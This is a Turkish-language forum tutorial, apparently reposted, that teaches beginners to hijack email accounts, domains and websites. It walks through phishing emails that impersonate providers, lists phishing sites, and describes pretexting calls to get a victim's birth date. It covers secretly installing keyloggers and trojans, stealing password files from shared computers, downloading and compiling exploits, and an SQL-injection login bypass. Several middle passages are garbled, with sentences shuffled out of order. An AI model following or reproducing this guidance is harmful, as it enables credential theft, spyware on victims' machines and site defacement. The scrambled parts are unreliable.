YENİ BAŞLAYANLARA GENİŞ HACKING ANLATIMI // 1.

BÖLÜM Değerli arkadaşlar, forumlardaki bilgilerin derlenmesi ve basite indirgenerek yazılması gerektiğine inanıyordum. Bunun için araştırdım, bu sırada kendim de geliştim. Şimdi, yeni başlayanların anlayabileceği düzeyde, geniş açıklamalı & içerikli bir döküman olması için bunu yazıyorum. Sıfırdan başlayan arkadaşlar için çok faydalı, "vasat" arkadaşların da içinde ufak detaylar bulabileceğini düşündüğüm bir döküman... Umarım faydalı olurum. Bu anlatımlarda, pratikten ziyade teorik bilgi vermek durumundayım ama, teoriyi oldukça geniş tuttuğum için pratik yapmanız kolaylaşacak inşAllah. Bunun yanında öğrendiklerinizi misyon dahilinde faaliyete geçirmeniz için çalışmanız gerekiyor. Anlatılanları pratiğe geçirirken karşılaştığınız soru(n)ları buraya veya başlı başına açtığınız bir forum konusuna yazarsanız yardımcı oluruz... Veya MSNM gibi iletişim programlarıyla da kafanıza takılanları "usta"larımıza sorabilirsiniz. Bu kadar nutuktan sonra, başlayalım... Web sitelerini hack’lemek için kullanılan iki yöntem vardır, domain ve host hack. Domain sitelerin adresidir, hosting ise siz sitenin adresini yazdığınızda yönlendiğiniz bilgisayardır, yani sitenin içerisindeki tüm dosyaları barındıran bilgisayarlar... Örneklendirecek olursak www.Cyber-boys.com bir domain’dir. Fakat bu sitede bulunan tüm dosyalar, bir hosting firmasının bilgisayarları içindedir. Siz adres bar’ınıza http://www.Cyber-boys.com yazdığınızda, Cyber-boys.com undosyalarının bulunduğu bilgisayara yönlenirsiniz. Bir sitenin domain’ini hack’lediğinizde, o domain’i sizin "hacked by xxx" yazan sayfanıza yönlendirirsiniz ve bu şekilde siteyi hack’lemiş olursunuz. Hosting hack’te ise, direkt olarak sitenin içeriğini değiştirir, Admin kullanıcısının ayarları ile oynar, yönlendirme ile filân uğraşmazsınız. Şimdi yöntemlerden bahsedeyim... Mail-hack: Domain hack için kullanılan en önemli yöntemlerden birisi mail hack’tir. Önce www.arama.com/domain.php3 gibi adresleri kullanarak hedefimizdeki siteye whois çekeriz (Whois çekeriz dedim de kafanız karışmasın; sadece verdiğim adrese gidip karşınıza çıkan kutucuğa hedefteki sitenin ismini girip ilgili düğmeye tıklamanız yeterli ) ) ve orada admin mail veya technical contact gibi kısımlarda yazan mail adresini hack’leriz. Daha sonra bu whois bilgilerinde yazan domain veya host firmasına (ns1.xxx.com, ns2.xxx.com, veya register through yazan yerlerden kopya çekebilirsiniz, birazcık İngilizce’yle olayı anlayabilirsiniz zaten) hack’lediğimiz adresten mail atarız ve deriz ki: "şifremi unuttum, siteme giriş yapamıyorum. Yani size rahatsızlık vermek istemem ama şu şifremi, görmüş olduğunuz bu mail’e atar mısınız?". Eğer size direkt olarak şifreyi yollamak yerine "Dur bakalım birader... Senin adın, yaşın, şeklin şemalin, yani bize kayıt olurken kullandığın bilgilerini bir gönder bize ki, senin o sitenin sahibi olduğuna inanalım ve sana şifreyi yollayalım. Ne malum senin siteyi hack’lemeyeceğin?" gibi bir cevap gelirse, whois bilgilerinin arasında bulunan admin-name, admin-city gibi bilgileri derleyin, şöyle bir kalıba oturtun ve sizden üye olurken kullandığınız bilgilerinizi isteyen şirkete yollayın... Hack’lemek istediğiniz sitenin domain veya host şirketi (genelde aynı şirket olurlar) size şifreyi yollayacak... Veya hiç mail yazmakla uğraşmadan, domain şirketinin sitesine girersiniz ve orada online olarak şifrenizi yolladıkları "Şifremi Unuttum!" gibi bir link varsa orayı kullanırsınız. Onlarda size şifreyi yollar... Eğer şifre gelirse, bu şifreyi sitenin FTP’sinde de deneyerek sonuca ulaşabilirsiniz (belki, çünkü kullanıcı adı da lazım FTP’lerde ve bu çok değişik kelimeler olabilir, siteadi.com olmayabilir kullanıcı adları büyük ihtimalle! En iyisi manuel olarak muhtemel kullanıcı isimlerini denemek veya finger çekmek -ki uzun iştir finger çekmek, konu dağılmasın. O yüzden burada yazmıyorum nasıl yapıldığını, ilerleyen bölümlerde yeri gelince kısaca değineceğim.-...) veya domain şirketini kullanarak, domain’i içinde "Hacked by xxx" yazan bir adrese yönlendirebilirsiniz...)

Tabii bu anlattıklarım için, öncelikle mail-hack’ten biraz anlamanız gerekiyor. O yüzden size şu anda hatırladığım birkaç mail-hack yöntemini yazayım: 1. Fake mail: Tecrübesiz kullanıcıların mail’lerini almak için bire bir. Kurbana bir anonymous mail (Anonymous Mail=Belli bir mail adresinizin olması gerekmeden atabildiğiniz, kimlik bilgilerinizi taşımayan mail’lerdir denebilir) yollayan (aenima mail bomber gibi çoğu mailbomber bu işi yapabiliyor) bir program veya bir fake mail/anonymous mail sitesi (mesela anonymous mail hizmeti www.anonymouse.ws adresinde var) kullanarak fake mail atabilirsiniz. Direkt olarak fake kodunu HTML şeklinde kendi elinizle yazabilirsiniz, ama "bununla uğraşamam" derseniz hazır fake kodlarını ve fake mail sitelerini kullanabilirsiniz. Tam yeri gelmişken söyleyeyim arkadaşlar, Hacking ile uğraşacaksanız en azından HTML’i bari bilin. Hazır fake kodlarını veya fake sitelerini de kullanabilirsiniz ama emin olun ki hiç bir kod sizinkinden güzel olamaz!.. Sadece Fake’de değil, her konuda lâzım HTML... Bunu öğrenin en azından... . Ayrıca Fake sitelerinden bazılarını biraz aşağıda veriyorum. Öncelikle, fake mail’in mantığı nedir? Fake mail’de, adama kullandığı mail account şirketinden, veya -daha kesin sonuç alabilirsiniz- adamın üye olduğu herhangi bir portaldan bir mail atıyormuş ve onun şifresine ihtiyaç duyuyormuş gibi davranıyorsunuz. Örneğin adama members@yahoo.com adresinden mail atıyormuş gibi gösteriyorsunuz (farklı bir mail’den geliyormuş izlenimi verme özelliği hemen hemen tüm fake mail sitelerinde veya anonymous mail programlarında vardır), ve onun size yolladığı şifresi sizin belirttiğiniz mail adresine geliyor, yani sizin mail’inize. Meselâ siz Mynet yöneticisisiniz, "bir kullanıcı sizin siteniz hakkında bir şikayette bulundu, inceleme yapacağız" dersiniz ve "kullanıcı adı", "parola" ve bir de "sitenizin kısa tanımı" başlıklı 3 adet kutu gösterirsiniz. Formu kendi mail adresinize yönlendirirsiniz. Adam şifreyi yazıp gönder düğmesine bastığı an şifreyi siz alırsınız. Veya ne bilim, adama "üyelik aktivasyonu" başlığıyla bir mail atarsınız ve adamın üyeliğinin aktifliğinin korunabilmesi için size kullanıcı adı ve şifresini göndermesini söyleyebilirsiniz. Onun üye olduğunu bildiğiniz bir web sitesinin admin’i olarak ona mail atarsınız ve dersiniz ki "Sitemiz yeniden yapılanma içerisine girmiştir. Kullanılmayan hesaplar sebebiyle hem şirketimiz zor durumda kalmakta, hem de size verdiğimiz hizmetlerde aksamalar görülmektedir. Eğer sitemizi kullanmaya devam etmek istiyorsanız kullanıcı adınızı ve şifrenizi aşağıdaki kutulara girin (/aşağıdaki linkteki forma yazın)...." vs. diyebilirsiniz. Veyahutta... Önce kurbana saçma sapan birkaç adet mail atarsınız(mail-bomb yaparsınız) mesela "ERROAR 0013e5B" gibi saçma sapan bir içeriği olur. Sonra adamın mail aldığı şirketin üyelik hizmetkârı olarak bir mail atar ve dersiniz ki: "üyelik hesabınızda bir problem çıktı, üyeliğinizi yeniden yapılandırmamız için bize kullanıcı adı ve şifrenizi yollayın." Bunun gibi yalanlarla adamın şifresini istiyorsunuz ve adam sizin kendi mail adresinize veya hazırladığınız Fake script’ine yönlenmiş olan forma şifresini gönderdiği an, artık size kalan şifre ve kullanıcı adını mail sitesinin login kısmına girip mail’i hack’ledikten sonra, kullanıcı şifresi ve gizli soru gibi çeşitli bilgileri değiştirmek... Ve ardından, hiç vakit geçirmeden host veya domain şirketinden şifreyi istemek. Bu arada atlanmaması gereken bir konu var ki, bazı siteler HTML hâlinde gönderilen mail’leri biçimlendirmiyor, kodları gösteriyor (Mynet). Bunu atlatabilmek için stratejik bir site alıyorsunuz (mesela uyelikservisi.sitemynet.com gibi -mynet için inandırıcı olur bu tabii ki-) ve attığınız mail’de diyorsunuz ki: "aşağıdaki linke tıklayın ve bize şu şu şu sebepten dolayı yollamanız gereken bilgilerinizi gönderin." Aşağıdaki linkin bulunduğu siteye siz fake kodunu atıyorsunuz ve sonuçta mail sizin. Fake sonuçlarının size ulaşabilmesi için kendi fake servisinizi de kurabilirsiniz. Mesela ücretsiz asp host’u veren websamba.com gibi bir yerden site alırsınız, bedava ASP destekli adresinize, sonra da paketteki hazır HTML kodunu veya kendi yazdığınız kodu

<form action="..." kısmındaki yeri değiştirip meselâ <form action="http://www.websamba.com/Websamba daki_Kullanici_Adiniz/kayit.asp" şeklinde ayarlarsanız, sonuç alırsınız. Veya hiç uğraşmadan da hazır fake sitelerini kullanabilirsiniz... Bir kaç tanesi: http://members.lycos.co.uk/pcsever/fake www.siberkorsan.net/fake/index.php www.hademeler.netteyim.net/fakemail.htm http://members.lycos.co.uk/lenogin/index.php?sys=tur1 http://members.lycos.co.uk/hacktim/index.php www10.brinkster.com/Dostturk/fake.htm www.kingsoffalcons.com/fake/index.php www.nailkaplan.tr.cx http://members.lycos.co.uk/adminnet/index.php?sys=tur1 Fake konusu biraz da sizin yaratıcılığınıza bağlı... Temel olarak mantığı yukarıdaki gibi... Tabii ki fake atarken kullanılan dilin resmî ve nazik olması önemli. Bunun yanında sonuna "Mynet A.Ş.", "Hotmail", "Yahoo! Member Services" gibi şeyler yazarsanız daha inandırıcı olur. Lâkin Doktor’a gönderilen fake(!)’deki gibi "saygılarımızla yahoo a.ş." yazarsanız millet sadece sizinle dalga geçer...) Bu arada, fake’inizde adamın mail’inin alınmış olduğu şirketin sürekli kullandığı logosuna, resimlerine, linklerine de mail’iniz içerisinde yer verirseniz daha inandırıcı olur... ("Acaba onu Nası yapacam?" demeyin, hiç olmazsa HTML’i öğrenin be arkadaşlar! Tabii ki <img> ve <a> etiketleriyle)) 2. Gizli soru tahmini: Eğer şansınız varsa en zahmetsiz ve risksiz yöntem diyebilirim. Bilirsiniz ki çoğu mail şirketi üye olurken "şifreni unutursan girer ve şifreni değiştirirsin" düşüncesiyle bir gizli soru ve cevap belirlemenizi isterler sizden... Ve bazı kullanıcılar gizli soruları ve cevaplarını basit seçerler: "adın ne", "en sevdiğin içecek ne" vs. İşte böyle durumlarda ya atmasyon yaparsınız, ya da adamla dostane bir şekilde irtibat kurar, bir süre konuştuktan sonra çaktırmadan gizli sorusunda saklı olan bilgiyi sorar ve öğrenirsiniz. Sonra da mail’ini alırsınız ve şifreyle birlikte gizli soruyu da değiştirip mail’in sizin elinizde devamlı kalmasını sağlarsınız. Hotmail’de gizli soruya ulaşmak için aşağıdaki adresteki, xxx@hotmail.com ile gösterilen yere kullaniciadi@hotmail.com veya kullaniciadi@msn.com yazarak adamın gizli sorusuna ulaşabilirsiniz, eğer mail’i alan kimse ülke seçilen bölümde Türkiye’yi seçtiyse. Eğer Türkiye seçili değilse -tıpkı benim mail’imdeki gibi-, sizden bir eyalet veya başka bir ülke seçmenizi isteyecektir hotmail. Eğer adam kayıt olurken Amerika’yı seçtiyse yandınız, çünkü ülke+eyalet+posta kodu’nu doğru girmeniz gerekiyorki bu da imkânsız. Neyse ben URL’yi veriyorum: https://memberservicesnet.passport....com&xcountry=TR Mynet’te ise Mynet Brutus programını kullanabilirsiniz. İlk versiyonda bazen atlayabiliyor, ama ikinci versiyonu sadece Windows XP’de çalıştığı için deneyemedim -yalnız herkes sorunsuz çalıştığını söylüyor-. Bu programı kullanarak adamın doğum tarihini buluyorsunuz, sonra Mynet’e gidip gizli soruya ulaşmaya çalıştığınızda "doğum tarihini girmeden geçemezsin!" dediği zaman brutus’le öğrendiğimiz doğum tarihini giriyor ve gizli soruya ulaşıyoruz. Sonrası, sizin yaratıcılığınıza kalmış bir şey... Allah yardım etsin... Yahoo!’da ise "forgot password"le hiç uğraşmayın, arasında postal code’un da olduğu bir

Bunu yapmanızı önermem. Eğer elinize bir şekilde bir sitenin database’i geçerse. Eğer okulda veya herhangi bir internet kafede kafayı taktığınız. 5.com gibi crack arama motorlarını kullanarak serial’larına ulaşabilirsiniz.herhangi bir platformdaki üyelik hesabına girmek için kullanıcı adı ve şifresini kullanacağından ve bu bilgilerde size rapor edilenler arasında bulunacağından. keylogger’ları kurarken size "nereye kurayım?" dediğinde "crogram filesaccessoriesHyperTerminal" gibi kimsenin bakmak aklına gelmeyecek yerlere kurun ve eğer varsa başlat’taki. Bu programların isimlerini araştırarak bulabilirsiniz ama XPCSpy ve Invisible Keylogger isimli programların iyi keylogging yaptığını duymuştum. Trojan: Adamın mail adresine veya MSNM gibi dosya paylaşımı yapılan ortamlarda bu Truva Atlarını yolluyorsunuz. Ayrıca Database hack kısmına ikinci derste değineceğim. basılan tuşları şifreleyip sizin mail’inize daha önceden belirlediğiniz zaman aralıklarıyla rapor etmesidir. Muhtemelen hack’lersiniz!.exe genelde). 3..takım bilgileri girmeniz gerekiyor. mutlaka mail’ini veya sitesini almak istediğiniz birisi varsa.. Ama bizim derdimiz kesinlikle adamın bilgisayarına zarar vermek değil. kendi hâlinde. Verme ihtimali var. bu programları onun bilgisayarına kurun/kandırarak kurdurun ve onun bilgilerini kullanın. şifrelerine ulaşmak (bilgi paylaşımı ) ). masaüstündeki program kısayollarını kaldırın ki. aldığınız şifreyi kullanmak yoluyla adamın mail ve sitelerini hack’lemek şansı elinize geçecek.. sonra da gider mail adresi üzerinde o şifreyi denersiniz. Chat Ortamında Şifre İstemek: Evet. mail. masum kimselerin olacaktır. aklınıza gelmeyen pek çok şey yapabilirsiniz. bu tip insanlarda var.. Serial falan isterlerse crackfind.. Masumlara dokunmayın!... -mail/FTP/internet account dahil. Adam bilgisayarını kullanırken arada bir..... oraya-buraya üye olurken mail/FTP/internet account şifrelerimizi kullanmamamız gerektiğini de çıkartmış olmalısınız. İsterseniz tüm şifrelerine el koyabilir. kurbanla chat yapabilir. sonra biraz nazlanarak mail şifresini istiyorsunuz. Bu da sallamayla tutturulacak bir şey olmadığına göre. o bilgisayar sizin kontrolünüz altına giriyor. isterseniz de sistemine çeşitli zararlar verebilirsiniz.. ona mesajınızı gösterebilir. CD-Rom’unu açmak gibi oyunlar oynayabilir.. hatta web sitesi şifresi olarak kullanan insanlar %85’lik bir orana sahiptir nereden baksanız. Bu arada bu tip keylogger’ları hedef bilgisayara siz kuruyorsanız şuna dikkat edin. bulunmaası çok zorlaşsın. Kurban bu programları bilgisayarına kabul edip çalıştırdığı zaman (server... adamın şifresini ve mail adresini oradan öğrenir. Database Hack: Bir siteye üye olurken kullandığı şifreyi. bilgisayarı bazı portlarda açık oluşturuyor ve sizin bilgisayarınızdaki ana program vasıtasıyla bu portları kullanarak hedefteki bilgisayara bağlanıyorsunuz. Yani kız taklidi yapıyorsunuz. Çoğu trojanda otomatik olarak "şifreleri getir" anlamına gelen işlevler / keylogger sistemleri olur ve siz . 4. çünkü bu yöntemle alacağınız mail’ler genellikle zararsız. birkaçta resim atıyorsunuz. Amma. Keylogger’ları devreye sokabilir. Buradan. eğlence/mizah/geyik bölümünde böyle bir olayın örneğine rastlayabilirsiniz!) 6. Keylogger programlar: Casus programlar olarakta adlandırılan bu keylogger’ların mantığı şudur: Bir bilgisayarda yapılan işlemleri.

bunları aktif hale getirdiğinizde kurbanın şifrelerine sahip olursunuz. Yalnız çok bilinen trojanların büyük bir bölümü anti-virüslerce de bilindiği için, kandırdığınız adamın antivirüsü feryad-u figâna başladığı an (hele carspersky’nin bir bağırışı varki evlere şenlik ) şaklaban olursunuz. Yani bu tip dezavantajları da var. Bunun için bilinmeyen ve yeni çıkmış, taptaze, sımsıcak programları kullanmak her zaman için daha iyi sonuçlarla karşılaşmanıza sebeptir. Ve bazı trojan’ların kullanımları birbirini tutmuyor, aslında mantık aynı olsa da. Siz elinizdeki asıl programla (client.exe) server.exe gibi bir programcık oluşturur ve bunu karşı tarafın bilgisayarında çalıştırmasını 8 gözle beklersiniz... Veya karşının IP numarasını trojandaki ilgili yere yazıp açıklardan içeri dalabilirsiniz (R3X mantığı)... Aklıma gelen birkaç trojan: SubSeven, ProRat (Türkçe), Turkojan (Türkçe), Pro Aigent, netbus, schoolbus... Fakat bilinmeyen trojanların kullanımı daha iyidir... 7. Saksıyı çalıştırmak: "Şimdi bu ne demek istemiş?" diyen birileri çıkacaktır eminim... Evet benim çok dikkatimi çekti ve gerçekten çok beğendim bunu... Farinelli abinin forumlarda yazdığı bir mesajını aynen aşağıya alıyorum... Mesajı Yazan: farinelli 15 Kasım 2003 saat 18:02 - Kayıtlı IP arkadaşlar ben en son hacklediğim siteyi anlatmak istiyorum... Ki sadece programlama bilmek yetmiyor anlaşılsın... www.XXXXX.com adresine whois çektim... domain.comdan. Adamın her türlü bilgisi gerçekti... Yahoo maili bırakmış... Denedim doğum tarihi v.s gerekliydi ne yaptım biliyormusunuz... bilinmeyen numaraları aradım... İstanbul/avrupa yakasında X mahallesinin muhtarının telefonunu aldım.. (adamın adresine kadar herşey gerçekti). Muhtarın çalışanlarınndan birine sert bir ses tonuyla.. ben keller partisinden arıyorum dedim (çok ciddiyim) buyrun dedi... Bir genel kurul üyemizin kayıtları için teyid almam gerekiyor dedim... Arada bir "tamam başkanım buldum" dedim... Adamın adresini adını herşeyini, yanıt vermeden önce ben saydım... Kadın şaşırdı... bana sadece doğum tarihi lazım dedim...Verdi... Sonrası malum... Domain.com’a şifremi unuttum dedim... Maili verdim bir baktım ki mailde parıl parıl parlıyor şifre... İşte size bir hack hikayesi.... ___________________________________________ Nasıl ama???)) Geliştirilebilecek, daha aklı başıında bir hâle getirilebilecek, pek çok bilgiye ulaşmamıza yardımcı olabilecek, zekice bir iş... (Olayın gerçekliği tartışılabilir ama ben fikir vermesi açısından aldım bunu, ki farinelli abim yalan söylemez ). Demekki neymiiiiş? Hack sadece teknikle yapılmazmııışş!... Saksıda lazımmıış!... 8. Reset Password Özelliği (hotmail vs.) Hotmail’de şifremi unuttum diyorsunuz ve karşınıza gelen reset password linkini kullanarak iletişim formuna ulaşıyorsunuz. Bu forma kurbanın kişisel bilgilerini yazıyorsunuz ve en sonunda da diyorsunuz ki "şifremi ve gizli cevabımı unuttum/birisi mail’imi hack’lemiş, bir zahmet size belirttiğim mail adresime bunu yollar mısınız?". Tabii ki formda size ulaşılabilinmesi için bir mail adresi yazılacak kutucuk var, oraya kendi mail adresinizi yazıyorsunuz. Ama burada şuna dikkat edin; meselâ hack’lemeyi düşündüğünüz mail ebruzkiran@hotmail.com sa, siz öncelikle email.com, mynet.com,

matrixportal.com gibi beleş mail veren yerlerden aynı isimde bir mail alın ve o kutucuğa onu yazın ki, inandırıcılığınız artsın. Yani örneğe göre yazabileceğiniz bir adres ebruzkiran@email.com ... Şifreniz gelince de gidip hemen mail’i hackliyorsunuz. Tabii ki reset password formuna girdiğiniz tüm bilgilerin doğru olması gerek şifrenin gelmesi için... 9. Paylaşıma açık bilgisayarları sömürmek: R3X, Hound, Hallet, essential Net Tools gibi programları kullanarak önce bir IP aralığını taratıyoruz, sonra da çıkan paylaşıma açık bilgisayarlara -programın özelliğine bağlı olarak- ya girip Windows dizini altındaki PWL dosyalarını, program filesglobalscapecuteFTP dizinindeki sm.dat veya smdata.dat dosyalarını çekiyoruz, ya da programın "şifreleri getir" veya "keylogger" gibi bir işlevi varsa onu kullanarak şifreleri elde ediyoruz. PWLTools gibi programlarla elde ettiğimiz dosyaların içindeki şifreyi kırıyoruz, sonrası ise PWL’lerden elde ettiğiniz şifreleri mail veya FTP hesabında denemenize kalmış... (Eğer FTP şifresini aldıysanız -.DAT dosyaları ile- zaten FTP şifresi elinizde, gidin hack’leyin.) Aslında bunu trojan başlığında da yazabilirdim ama farklı bir konu... Mail hack konusunda hatırlayabildiklerim bu kadar... Arkadaşlar, yeri gelmişken... freeservers’tan alınmış siteleri hack’lemek için önce adamın mail’ini hack’liyorsunuz ve sonra ****************’a gidip "şifremi unuttum" diyorsunuz ve oraya adamın mail adresini yazıyorsunuz. Tüm şifreler geliyor. Toplu katliyam şansı... . Peki 8m, 8k, 4t, s5 ... kısacası freeservers sitelerinin sahiplerinin kullandıkları mail’lere nasıl ulaşacağız? Bunu öğrenmek için aşağıdaki adreste, xxx.xxx.com yazan yere, siteadi.8m.com gibi Site_adı.freeservers_uzantısı.son_uzantı şeklinde adresi yazacaksınız ve to: bölümünde yazan mail adresini hack’lemek için çalışacaksınız. URL: http://xxx.xxx.com/cgi-bin/emailme Ve bir not... Eğer bir site MUTLAKA AMA MUTLAKA hack’lenmeliyse, whois çekip sitenin "son kullanım" tarihini öğrenirsiniz. O tarihte bakarsınız, eğer webmaster henüz siteyi almadıysa domain i siz alırsınız.. Böylece adamı farklı bir domain almaya zorlar, sitenin ziyaretçi potansiyelini büyük ölçüde düşürürsünüz... Evet arkadaşlar, ilk "anlatım"ın sonuna geldik. Anlamadığınız her şeyi sorabilirsiniz. Yakında ikinci bölümü de yayınlayacağım inşAllah. Şimdilik bu kadar, birkaç gün sonra II. bölümde buluşmak üzere...

Buyrun Geniş HACKERLİK anlatımı
Öcenlikle mrb arkadaşlar ben forumtr ilk geldiğim günden beni Web Hack kısmı ile ilgilendim bende hackerlik yapmak istedim ama öğreteneniz olmadı bende kendim buldum google den siz bana öğretmediniz ama ben öğrenemk isteyen lere veriyorum saygılar. GENİŞ HACK ANLATIMI

Exploit meselesiyle başlayalım... Hack konusu içinde çok büyük bir önemi olan Exploit’ları en ince detayına kadar anlatmam mümkün değil, ama size mantığını ve konu hakkında bazı noktaları anlatacağım. (Konuyla ilgili herşey anlatılabilecek olsaydı, forumlarda "exploits/vulnerabilities" diye başlı-başına bir topic olur muydu?...). Aslında hack’lenen sitelerin büyük bir bölümünün bu yöntemle indirildiğini söyleyen arkadaşlar da yok değil. Ben buna çok da inanmamakla beraber, başarılı ve "uzun ömürlü" bir "defacer" olmak isteyenlerin mutlaka ilgilenmeleri gereken bir konu olduğunu düşünüyorum bu konunun. Neyse... Konuya geçelim... Exploit’lar sayesinde bir sitede veya bir hosting bilgisayarında en yetkili kişi olmak mümkün. Amacı bu. Sizi o sitede veya server’da en yetkili kişi (yönetici) yapmak. En yetkili kişi olunca da, o site veya server’daki tüm siteler konusunda her istediğinizi yapabilirsiniz. Exploit’lar local ve remote olmak üzere iki şekilde yazılır. Local exploit’ları kullanabilmek için o hosting firmasında sizin de bir hesabınızın -yani bir sitenizin- olması gerekir. Local exploit’larla server’daki sitelerin hepsini hack’leyebilirsiniz. Remote exploit’ları kullanabilmek için server’da bir hesabınızın olması gerekmez, kendi bilgisayarınızda exploit’u çalıştırabilirsiniz. Tüm server değil, tek siteyi deface edersiniz... Aralarındaki fark bu... Exploit’lar genelde derlenmesi gereken kodlardır. Bazen, nadiren de olsa online çalıştırabileceğiniz exploit’larda bulabilirsiniz. Meselâ aşağıda verdiğim exploit, online olarak çalıştırılabilir ve sizi PHP-Nuke 6.5 ile yapılmış sitelerde admin yapar. Link: http://packetstormsecurity.nl/0310-...hp-nuke.6.5.php Fakat çoğu exploit yukarıda verdiğim gibi online olarak, bir siteden çalıştırılamaz. Bunlar için önce hosting bilgisayarının, yani server’ın hangi işletim sistemini kullandığını öğrenmelisiniz. Bunun için www.netcraft.com sitesine gidip sol üst kısımdaki yere sitenin ismini yazarsınız. search dediğiniz zaman sitenin hangi işletim sistemi üzerinde çalıştığını öğrenirsiniz. Daha sonra da bu sistemin exploit’unu bulur, siteyi hack’lersiniz. İşletim sistemlerine göre exploit’ları, exploit portalı olarak adlandırabileceğim www.packetstormsecurity.nl , www.phreak.org/html/exploits.shtml ve hack.co.za gibi adreslerden bulup indirirsiniz veya google’da işletim_sisteminin_adı exploit şeklinde aramalar yaparak istediğiniz exploit’u çekebilirsiniz. Şunu da hatırlatayım; sizi bir sistemde en yetkili kişi yapan exploit, farklı sistemde işe yaramaz. Söz gelimi bir linux exploit’u windows NT’de iş görmez... Exploit’lar genelde .C veya .PL uzantılıdır, bazıları ise çok az da olsa online çalıştırılabilir PHP dosyalarıdır, yukarıdaki örnekteki gibi... Önce ilgili exploit’u bilgisayarımıza download ediyoruz. Exploit’un uzantısı .c ise bunu shell’de derlememiz lazım. Shell nedir? Shell hesabı aldığınızda sürekli ve hızlı bir net bağlantısı olan bir makinede, linux komutları çalıştırabileceğiniz bir yeriniz olur. Biraz web sitesi mantığına benziyor. Web sitelerinde

sağlam altyapılı bir shell temin ettik. Bunlarla exploit’larımızı şöyle derleriz: Öncelikle indirdiğimiz exploit dosyasını -ismini değiştirmeden./exploit -h hacklenecek_site veya. Söz gelimi exploit’umuzun adı exp. Varsayalım ki bir yerden işimize yarayabilecek.com/ASPN/Downloads/ActivePerl/ Buradaki programı download ettikten sonra kuruyoruz. exploit... gcc -o exp exp.c ise. .bir web sitesine atıyoruz. çekilmiş demektir. Mynet. . şu komutu yazıyoruz: wget http://exploit u_attiginiz_site/exploit_adi. Biraz . Burada yanlış anlaşılma olmasın. fakat bu shell’lerin işimize yaraması çok zor./exp -h xxx gibi kullanmalısınız../ işaretlerinden sonra exploit’un ismini yazacağız. Daha sonra bu exploit dosyasını: . Sonra Shell hesabımıza Putty programını kullanarak bağlanıyoruz. Shell’de ise aldığınız yerde Linux komutları çalıştırabilirsiniz. Bu ekranı da okuyarak exploit’un nasıl çalıştırılacağını öğrenebilirsiniz ama. Daha sonra şunu yazmalısınız: gcc -o exploit exploit./exploit -i Hacklenecek_sitenin_IP’si yazarak çalıştırılır. Bu programın amacı kısaca Shell kurulu bilgisayarlara bağlanmaktır -Hani web sitelerinin FTP’sine ulaşmak için CuteFTP gibi programlar kullanıyoruz ya.c Burada shell. şimdi de çok kısa olarak PERL’de exploit derlemekten bahsedelim.c Bu komutla shell exploit’u bünyesine çekecektir. O yüzden paralı shell alınması veya bilgisayarınıza Linux kurulması gerekebilir (veya bir arkadaşınızdan Shell hesabı bulabiliyorsanız bulun derim). tabii ki.. .-. genelde exploit’lar: . Aralarında böyle bir benzerlik ve fark var. Kurulumu yarıda kesmeyin.bir hosting alırsınız ve buraya dosyaları upload edebilirsiniz.. Shell’e bağlandıktan sonra. bunu da bir nevi buna benzetebilirsiniz. Çünkü içerikleri geniş tutulmaz bunların. Websamba vs. Bu arada server sahibi exploit’un önlemini aldıysa işe yaramazlar. olabilir. Bunu yazdığınızda.activestate. Dosyanın çekilip çekilmediğini ls yazarak çıkan dosya listesinden exploit’un ismini görürseniz anlarsınız.c ve sonra da ../exploit yazarak çalıştırabilirsiniz.c dosyasını derleyecek ve derlenmiş hâlinin adını exploit yapacaktır. Net’te bedava shell’ler var. karşınıza gelecek ekranda Exploit’un nasıl kullanılacağını anlatan yazılarla karşılaşacaksınız.PL uzantılı exploit’leri derleyebilmek için öncelikle Active PERL programını download etmelisiniz. Tabii Shell’i daha da geniş anlatmak mümkün ama biz de zaten Shell’in Linux komutu çalıştırma özelliğinden faydalanarak exploit’ları derleyeceğiz. Link: http://aspn.

sizi otomatikmen C:windows klasörüne atar. hatta sitenin ortasına "HaCKeD BY XXX" yazın. Bilgisayardan hiç çakmayan arkadaşların bu konularla uğraşması ne denli doğrudur. Bu komutla o klasörü açabilirsiniz. şunu yazarak exploit’umuzu kullanılır hâle getiririz: perl exploit. *Yasak Kelime*hacker’ken bu konuda uzun bir döküman yazmıştı ("inputlar ve veri doğrulama" isminde). Burada... Eğer tutturamazsanız. MS-Dos Komut İstemi’ni açıyoruz ve orada c erl in klasörüne geçiyoruz. siteadi/login. onları yapabilirsiniz. aspindir. Kurulum bittikten sonra. sitede en yetkili kişi olursunuz. hack’lenecek sitenin host’unda kurulu olan sistemi öğreniyoruz ve exploit’unu buluyoruz.. Hiç yoktan birazcık Dos temeliniz olsun arkadaşlar. bu bilgileri gireceğimiz formuna ulaşın (login form) ve aşağıdakileri ilgili kutuya yazın : Kullanıcı adı: ’or’’=’ Şifre: ’or’’=’ Her iki kutucuğa da aynı şeyi yazıyoruz ve şansımız varsa sitede "hoppala" admin oluyoruz! Formlardaki type="Hidden" değerini sömürmek: Genelde ASP destekli üyelik sistemleri üzerinde çalışan sitelerdeki bir açık. Exploit’unuz nelere izin veriyorsa. istediğinizin şifresini alın.asp . *Yasak Kelime* abi... yani index’te "admin girişi" diye bir yer görünmüyorsa.com gibi hazır kod sitelerinden download ettiğiniz script’leri incelerseniz. Exploit konusunda anlatacaklarım bu kadar..asp . siteadi/forum/admin. google. bir şeyler anlatmış olması gerekir diye düşünüyorum.asp . linux gibi konulardan bîhaber arkadaşlar için çok zor. Hack yöntemlerinden birisi de ASP ve PHP gibi dillerin açıklarından faydalanmak. Allah yardımcınız olsun .pl -h www. Fakat yukarıdaki bölümün size yine de bir mantık vermiş. google sizin için sitede admin kelimesi geçen tüm sayfaları gösterecektir. Kullanıcı adı/şifre girişi isteyen bir sitenin. Sonra bu exploit’u c erl in klasörüne kopyalıyoruz.yardımcı olacak pek çok arkadaş çıkacaktır emin olun. Örneğin siteadı/admin. admin panelinin nerede tutulduğunu öğrenebilirsiniz. Devamı ise exploit’un özelliklerine bağlı. öncelikle site üzerinde manuel denemeler yapmalısınız.kurban.asp vs. /admin/login.. Bunun dışında.uzun sürebilir. ("Nasıl geçeceğim?" gibi bir soruyu kabul etmiyorum .. Bu tip açıklara biraz örnek vermek gerekirse: ’or’’=’ açığı: Önlemi alınmamışsa sizi administrator seviyesine yükselten bir açık. programlama dillerinin mantığından ve shell. Aslında sitede bir admin giriş yeri varsa ama bu sitenin direkt olarak anasayfasından ulaşılamıyorsa. İşinize yarayabilir.com şeklinde bir arama yaparsanız. onu .asp. /admin/admin. Siteye Admin olarak girdiğinizde de zaten istediğinizi sistemden atın. Bu açıklar sizi genelde Administrator seviyesine yükselten açıklar. Bunu çalıştırmak için. Üyelik sistemli ASP sitelerinde geçerli. 